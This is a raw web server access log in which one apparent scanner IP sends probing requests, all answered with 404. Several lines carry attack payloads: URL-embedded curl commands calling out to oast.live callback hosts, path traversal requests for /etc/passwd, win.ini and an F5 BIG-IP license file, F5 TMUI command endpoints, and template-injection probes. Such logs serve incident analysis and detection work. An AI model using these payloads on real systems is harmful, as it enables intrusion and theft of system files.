137.220.197.141 - - [21/Jan/2024:23:38:21 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogznaniekc8wdna.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogrh9mhdgwzcjpg.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:38:23 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogi98c98sibs61q.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogq7buahgw9wxcs.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:07 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogub4sna6rb3997.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog9yd5agznadmqf.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:09 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog9r5938ckxjat9.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogkdpkb89xoctdd.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:39 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:41 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:43 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:45 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:47 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:50 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:52 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:54 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:56 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsognwm3wjcmu3onj.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogo11pfcgj7axag.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:40:58 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog73tcf95f5577n.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsoga6wb86f5qu7ob.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
115.127.8.106 - - [21/Jan/2024:23:41:42 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:29 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:34 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:36 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:38 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:40 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:42 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:44 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:46 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:42:48 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:43:59 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:44:10 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:44:23 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:45:46 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:45:48 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:47:40 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:48:31 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:48:55 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:49:00 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog7yuacy4xx78jn.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog149ka6euk3geq.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:49:02 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogyfw57p8hidtoz.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogye1oa51a9uq1m.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:50:28 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:50:30 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:50:57 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:50:59 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:51:39 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:51:41 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:52:13 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:52:15 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:52:50 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:53:10 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogxb84zgejhnhjo.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog9zc7rfkewstzi.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:53:12 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogposcfqo668w4i.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsognryib17jsuyad.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:53:34 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog9iozoo8srgzdd.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsoga9n1csqnf9bik.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:53:36 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogszbw8hs5f31eq.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogafb5ryx3kdou3.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:54:53 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:00 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:02 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:05 +0100] "GET /cache/backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:23 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:25 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:34 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:36 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:48 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:48 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:50 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:50 +0100] "GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:55:57 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:56:00 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:56:25 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:56:27 +0100] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:58:44 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:58:46 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:59:05 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:59:08 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:59:13 +0100] "POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:59:30 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:59:32 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952